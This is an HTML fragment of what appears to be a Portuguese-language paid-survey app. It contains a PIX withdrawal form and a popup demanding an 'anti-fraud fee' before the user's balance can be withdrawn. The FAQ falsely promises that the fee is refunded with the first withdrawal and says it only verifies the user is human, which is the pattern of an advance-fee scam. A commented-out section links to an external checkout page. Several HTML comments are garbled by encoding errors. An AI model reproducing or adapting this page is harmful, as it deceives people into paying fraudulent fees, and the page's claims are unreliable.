<div style="margin-bottom: 15px;"></div>
<!--------------------- MENU EMBAIXO --------------------->

<div class="menuemb"><!-- Chamando a funÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Â§ao para mostrar "InÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Â­cio" --><a href="#" onclick="mostrarPagina('saque')"><span class="material-symbols-outlined" style="text-align: center; width: 120%; margin: 15px; font-size: 40px; color: #06B32E;">paid</span> </a> <!-- Chamando a funÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Â§ao para mostrar "Pagina 2" --> <a href="#" onclick="mostrarPagina('inicio')"> <span class="material-symbols-outlined" style="text-align: center; width: 120%; margin: 15px; font-size: 40px; color: rgb(101, 101, 101);">home</span> </a> <!-- Chamando a funÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Â§ao para mostrar "Saque" --> <a href="#" onclick="mostrarPagina('bonus')"> <span class="material-symbols-outlined" style="text-align: center; width: 120%; margin: 15px; font-size: 40px; color: rgb(101, 101, 101);">help</span> </a></div>
<input class="form-input" id="chave-pix" name="chave-pix" placeholder="Digite sua chave PIX aqui" type="text"> <input class="form-input" id="quantia" inputmode="numeric" name="quantia" oninput="formatarValor(this)" placeholder="Digite o valor que deseja sacar" style="margin-top: 15px;" type="text"><button class="desbloquear-button" onclick="showPopup()" style="font-weight: bold; font-size: 18x; border-radius: 12px; margin-top: 15px;">REALIZAR SAQUE</button> <!--------------------- TAXA DESBLOQUEIO --------------------->

<div class="popup-container" id="popup">      <script src="js/lottie-player.js"></script><lottie-player src="https://lottie.host/7c73a00c-afa8-4ad5-b6b7-d8050e57f0c3/pg6N0GhPE7.json" background="##ffffff" speed="1.25" style="width: 150px; height: 150px; margin: 0 auto; display: flex;" loop="" autoplay="" direction="1" mode="normal"></lottie-player>
 <!--<span class="popup-text" style="font-size: 20px; font-weight: bold;">APRENDA A DESBLOQUEAR<br>SEU SALDO EM 1 MINUTO</span>---> <span class="popup-text" style="font-size: 20px; font-weight: bold;">DESBLOQUEAR SEU SALDO</span>

<div style="margin-bottom: 20px;"></div>

<p class="popup-text" style="padding-left: 5%; padding-right: 5%; text-align: justify;">Usamos uma taxa anti-fraudes, para evitar fraudes e abuso dos saques que estavam ocorrendo dentro do sistema.<br>
<br>
Fique tranquilo, voce recebera o valor da taxa de volta junto ao valor do seu saque, e apenas uma etapa de validamento de que voce seria um humano e nao um robo.</p>

<div style="margin-bottom: 20px;"></div>
<button class="desbloquear-button" style="font-weight: bold;" onclick="window.open('saque')">DESBLOQUEAR AGORA</button></div>

<div style="margin-bottom: 20px;"></div>
<!--------------------- VIDEO DESBLOQUEIO ---------------------> 
<!--<div class="popup-container" id="popupvideo">
    
<p style="text-align: center; margin: 20px 5px 30px 5px; font-size: 16px; font-weight: bold;">
    ASSISTA O VÍDEO ABAIXO PARA LIBERAR SEU SAQUE E ACESSO VITALÍCIO
</p>

<script src="https://scripts.converteai.net/lib/js/smartplayer/v1/sdk.min.js" data-id="6755fde307d9af4244e9869f"></script> <div id="ifr_6755fde307d9af4244e9869f_wrapper" style="margin: 0 auto; width: 100%"> <div style="padding: 56.25% 0 0 0; position: relative;" id="ifr_6755fde307d9af4244e9869f_aspect"> <iframe frameborder="0" allowfullscreen src="https://scripts.converteai.net/882fe64e-9b06-4b42-ac47-5f5d87e748a2/players/6755fde307d9af4244e9869f/embed.html" id="ifr_6755fde307d9af4244e9869f" style="position: absolute; top: 0; left: 0; width: 100%; height: 100%;" referrerpolicy="origin"></iframe> </div> </div> <style> .elementor-element:has(#ifr_6755fde307d9af4244e9869f_wrapper) { width: 100%; } </style>
   
<a href="https://go.disruptybr.com.br/pbejt" style="display: block; text-decoration: none;">
    <button class="desbloquear-button" 
            style="font-weight: bold; font-size: 18px; border-radius: 12px; margin-top: 15px;">
        DESBLOQUEAR AGORA
    </button>
</a>
-->
<div style="margin-bottom: 40px;"></div>

    </div>

    
<!--------------------- Pagina bonus --------------------->

<div id="bonus" style="display: none;">

<!--------------------- Menu de cima --------------------->
<div class="menu"><a style="width: 30%; "> <img src="images/opinilogo.png" style="width:  110px;"> </a></div>

<div style="margin-bottom: 90px;"></div>

<div style="margin-bottom: 110px;"></div>

<p class="faq-title">Perguntas frequentes</p>

<div class="faq-container">
<div class="faq-item">
<div class="question" onclick="toggleAnswer(this)">Preciso pagar a taxa toda vez?</div>

<div class="answer">Não! A taxa seria paga somente a primeira vez, para confirmar que você é um humano, e não um robô. Você receberá o estorno do valor da taxa após o primeiro saque</div>
</div>

<div class="faq-item">
<div class="question" onclick="toggleAnswer(this)">Por que existe a taxa?</div>

<div class="answer">Serve como uma etapa anti-fraude, para evitar fraudes e abusos dos saques que estavam ocorrendo na plataforma! Mas não precisa se preocupar, você receberá o valor da taxa de volta junto ao valor do seu saque; seria apenas uma etapa de validação de que você é humano e não um robô.</div>
</div>

<div class="faq-item">
<div class="question" onclick="toggleAnswer(this)">Em quanto tempo vou receber?</div>

<div class="answer">Você receberá seu saque dentro de 24 horas, da mesma forma que você receberá seu saque teste!</div>
</div>

<div class="faq-item">
<div class="question" onclick="toggleAnswer(this)">Quantas vezes posso sacar por dia?</div>

<div class="answer">Quantos você quiser, mas existe uma quantidade limitada de códigos que temos acesso por dia!</div>
</div>

<div class="faq-item">
<div class="question" onclick="toggleAnswer(this)">Como usa o aplicativo?</div>

<div class="answer">É muito simples de usar! Basta responder às perguntas sobre as empresas no menu principal e, por fim, clicar no botão de 'Enviar respostas'. Quando enviar, você já receberá seu dinheiro pela tarefa realizada!</div>
</div>
</div>

<div style="margin-bottom: 150px;"></div>

<!--------------------- Menu debaixo --------------------->

<div class="menuemb"><!-- Chamando a funÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Â§ao para mostrar "InÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Â­cio" --><a href="#" onclick="mostrarPagina('saque')"><span class="material-symbols-outlined" style="text-align: center; width: 120%; margin: 15px; font-size: 40px; color: rgb(101, 101, 101);">paid</span> </a> <!-- Chamando a funÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Â§ao para mostrar "Pagina 2" --> <a href="#" onclick="mostrarPagina('inicio')"> <span class="material-symbols-outlined" style="text-align: center; width: 120%; margin: 15px; font-size: 40px; color: rgb(101, 101, 101);">home</span> </a> <!-- Chamando a funÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Â§ao para mostrar "Saque" --> <a href="#" onclick="mostrarPagina('bonus')"> <span class="material-symbols-outlined" style="text-align: center; width: 120%; margin: 15px; font-size: 40px; color: #06B32E;">help</span> </a></div>
</div>
<script src="js/scripts.js"></script>


<!--------------------- Fim do body --------------------->

</body></html>